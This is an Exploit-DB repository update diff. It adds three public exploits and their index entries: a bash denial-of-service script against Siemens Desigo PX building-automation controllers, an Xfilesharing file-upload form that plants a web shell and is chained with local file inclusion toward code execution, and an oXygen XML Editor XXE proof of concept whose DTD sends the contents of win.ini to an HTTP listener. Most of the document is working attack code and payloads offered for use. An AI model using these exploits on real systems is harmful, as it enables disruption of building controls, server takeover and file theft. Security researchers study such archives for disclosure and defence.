DB: 2019-11-15

3 changes to exploits/shellcodes

Siemens Desigo PX 6.00 - Denial of Service (PoC)

oXygen XML Editor 21.1.1 - XML External Entity Injection

Xfilesharing 2.5.1 - Arbitrary File Upload

exploits/hardware/dos/47657.txt

@@ -0,0 +1,109 @@
+# Title: Siemens Desigo PX 6.00 - Denial of Service (PoC)
+# Author: LiquidWorm
+# Date: 2019-11-14
+# Vendor web page: https://www.siemens.com
+# Product web page: https://new.siemens.com/global/en/products/buildings/automation/desigo.html
+# Affected version:6.00
+# Affected version: Model: PXC00-E.D, PXC50-E.D, PXC100-E.D, PXC200-E.D
+#                   With Desigo PX Web modules: PXA40-W0, PXA40-W1, PXA40-W2
+#                   All firmware versions < V6.00.320
+#                   ------
+#                   Model: PXC00-U, PXC64-U, PXC128-U
+#                   With Desigo PX Web modules: PXA30-W0, PXA30-W1, PXA30-W2
+#                   All firmware versions < V6.00.320
+#                   ------
+#                   Model: PXC22.1-E.D, PXC36-E.D, PXC36.1-E.D
+#                   With activated web server
+#                   All firmware versions < V6.00.320
+# CVE: N/A
+# Advisory ID: ZSL-2019-5542
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5542.php
+
+#!/bin/bash
+#
+#
+# Siemens Desigo PX V6.00 Web Remote Denial of Service Exploit
+#
+#
+# Vendor: Siemens AG
+# Vendor web page: https://www.siemens.com
+# Product web page: https://new.siemens.com/global/en/products/buildings/automation/desigo.html
+
+#
+# Summary: Desigo PX is a modern building automation and control
+# system for the entire field of building service plants. Scalable
+# from small to large projects with highest degree of energy efficiency,
+# openness and user-friendly operation.
+#
+# Desc: The device contains a vulnerability that could allow an attacker
+# to cause a denial of service condition on the device's web server
+# by sending a specially crafted HTTP message to the web server port
+# (tcp/80). The security vulnerability could be exploited by an attacker
+# with network access to an affected device. Successful exploitation
+# requires no system privileges and no user interaction. An attacker
+# could use the vulnerability to compromise the availability of the
+# device's web service. While the device itself stays operational, the
+# web server responds with HTTP status code 404 (Not found) to any further
+# request. A reboot is required to recover the web interface.
+#
+# Tested on: HP StorageWorks MSL4048 httpd
+#
+# ================================================================================
+# Expected result after sending the directory traversal sequence: /dir?dir=../../:
+# --------------------------------------------------------------------------------
+#
+# $ curl http://10.0.0.17/index.htm
+# <HEAD><TITLE>404 Not Found</TITLE></HEAD>
+# <BODY><H1>404 Not Found</H1>
+# Url '/INDEX.HTM' not found on server<P>
+# </BODY>
+#
+# ================================================================================
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+# Zero Science Lab - https://www.zeroscience.mk
+# @zeroscience
+#
+#
+
+#
+# Vendor ID: SSA-898181
+# Vendor Fix: https://support.industry.siemens.com/cs/document/109772802
+# Vendor Advisory PDF: https://cert-portal.siemens.com/productcert/pdf/ssa-898181.pdf
+# Vendor Advisory TXT: https://cert-portal.siemens.com/productcert/txt/ssa-898181.txt
+# Vendor ACK: https://new.siemens.com/global/en/products/services/cert/hall-of-thanks.html
+#
+# CWE ID: CWE-472: External Control of Assumed-Immutable Web Parameter
+# CWE URL: https://cwe.mitre.org/data/definitions/472.html
+# CVE ID: CVE-2019-13927
+# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13927
+# CVSS v3.1 Base Score: 5.3
+# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:H/RL:O/RC:C
+#
+#
+# 06.06.2019
+#
+
+
+echo -ne "\n----------------------------------"
+echo -ne "\nSiemens Desigo PX HTTP Web RMI DoS"
+echo -ne "\n----------------------------------\n"
+if [ "$#" -ne 1 ]; then
+	echo -ne "\nUsage: $0 [ipaddr]\n\n"
+	exit
+fi
+IP=$1
+TARGET="http://$IP/"
+PAYLOAD=`echo -ne "\x64\x69\x72\x3f\x64\x69\x72\x3d\x2e\x2e\x2f\x2e\x2e\x2f"`
+echo -ne "\n[+] Sending payload to $IP on port 80."
+curl -s "$TARGET$PAYLOAD" > /dev/null
+echo -ne "\n[*] Done"
+echo -ne "\n[+] Checking if exploit was successful..."
+status=$(curl -Is http://$IP/index.htm 2>/dev/null | head -1 | awk -F" " '{print $2}')
+if [ "$status" == "404" ]; then
+	echo -ne "\n[*] Exploit successful!\n"
+else
+	echo -ne "\n[-] Exploit unsuccessful.\n"
+	exit
+fi

exploits/php/webapps/47659.txt

@@ -0,0 +1,34 @@
+# Exploit Title: Xfilesharing 2.5.1 - Arbitrary File Upload
+# Google Dork: inurl:/?op=registration
+# Date: 2019-11-4
+# Exploit Author: Noman Riffat
+# Vendor Homepage: https://sibsoft.net/xfilesharing.html
+# Version: <=2.5.1
+# CVE : CVE-2019-18951, CVE-2019-18952
+
+#####################
+Arbitrary File Upload
+#####################
+
+<form action="http://xyz.com/cgi-bin/up.cgi" method="post" enctype="multipart/form-data">
+    <input type="text" name="sid" value="joe">
+    <input type="file" name="file">
+    <input type="submit" value="Upload" name="submit">
+</form>
+
+Shell : http://xyz.com/cgi-bin/temp/joe/shell.php
+
+####################
+Local File Inclusion
+####################
+
+http://xyz.com/?op=page&tmpl=../../admin_settings
+
+This URL will fetch "admin_settings.html" template without any authentication. The ".html" extension is hard coded on the server so the included file must be with html extension anywhere on the server. You can even merge LFI with Arbitrary File Upload vulnerability by uploading an html file i.e. "upload.html" and changing the "sid" to "../../../../../../tmp" and so the file gets uploaded in tmp directory of the server. Now you can include the file like following.
+
+http://xyz.com/?op=page&tmpl=../../../../../../../tmp/upload
+
+The Xfilesharing script has builtin shortcodes as well so you can achieve RCE by including them in that "upload.html" file.
+
+Noman Riffat, National Security Services Group Oman
+@nomanriffat, @nssgoman

exploits/windows/local/47658.txt

@@ -0,0 +1,28 @@
+# Exploit Title: oXygen XML Editor 21.1.1 - XML External Entity Injection
+# Author: Pablo Santiago
+# Date: 2019-11-13
+# Vendor Homepage: https://www.oxygenxml.com/
+# Source:https://www.oxygenxml.com/xml_editor/download_oxygenxml_editor.html
+# Version: 21.1.1
+# CVE : N/A
+# Tested on: Windows 7
+
+#PoC
+
+1- python -m SimpleHTTPServer 8000
+1.1- Poc.xml :
+<?xml version="1.0"?>
+<!DOCTYPE test [
+<!ENTITY % file SYSTEM "C:\Windows\win.ini">
+<!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd">
+%dtd;]>
+<pwn>&send;</pwn>
+
+1.2.- payload.dtd
+<?xml version="1.0" encoding="UTF-8"?>
+<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>">
+%all;
+2- File -> Open -> *.xml
+
+#PoC Visual
+https://imgur.com/2H8DhL9

files_exploits.csv

@@ -6593,6 +6593,7 @@ id,file,description,date,author,type,platform,port
 47608,exploits/multiple/dos/47608.txt,"iMessage - Decoding NSSharedKeyDictionary can read ObjC Object at Attacker Controlled Address",2019-11-11,"Google Security Research",dos,multiple,
 47609,exploits/windows/dos/47609.txt,"Adobe Acrobat Reader DC for Windows - Use of Uninitialized Pointer due to Malformed JBIG2Globals Stream",2019-11-11,"Google Security Research",dos,windows,
 47610,exploits/windows/dos/47610.txt,"Adobe Acrobat Reader DC for Windows - Use of Uninitialized Pointer due to Malformed OTF Font (CFF Table)",2019-11-11,"Google Security Research",dos,windows,
+47657,exploits/hardware/dos/47657.txt,"Siemens Desigo PX 6.00 - Denial of Service (PoC)",2019-11-14,LiquidWorm,dos,hardware,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10771,6 +10772,7 @@ id,file,description,date,author,type,platform,port
 47645,exploits/windows/local/47645.py,"Control Center PRO 6.2.9 - Local Stack Based Buffer Overflow (SEH)",2019-11-12,sasaga92,local,windows,
 47647,exploits/windows/local/47647.txt,"Wondershare Application Framework Service - _WsAppService_  Unquote Service Path",2019-11-12,chuyreds,local,windows,
 47656,exploits/windows/local/47656.txt,"ScanGuard Antivirus 2020 - Insecure Folder Permissions",2019-11-13,hyp3rlinx,local,windows,
+47658,exploits/windows/local/47658.txt,"oXygen XML Editor 21.1.1 - XML External Entity Injection",2019-11-14,"Pablo Santiago",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -41971,3 +41973,4 @@ id,file,description,date,author,type,platform,port
 47652,exploits/hardware/webapps/47652.py,"Technicolor TC7300.B0 - 'hostname' Persistent Cross-Site Scripting",2019-11-13,"Luis Santana",webapps,hardware,
 47653,exploits/php/webapps/47653.txt,"gSOAP 2.8 - Directory Traversal",2019-11-13,"numan türle",webapps,php,
 47654,exploits/hardware/webapps/47654.py,"Fastweb Fastgate 0.00.81 - Remote Code Execution",2019-11-13,"Riccardo Gasparini",webapps,hardware,
+47659,exploits/php/webapps/47659.txt,"Xfilesharing 2.5.1 - Arbitrary File Upload",2019-11-14,"Noman Riffat",webapps,php,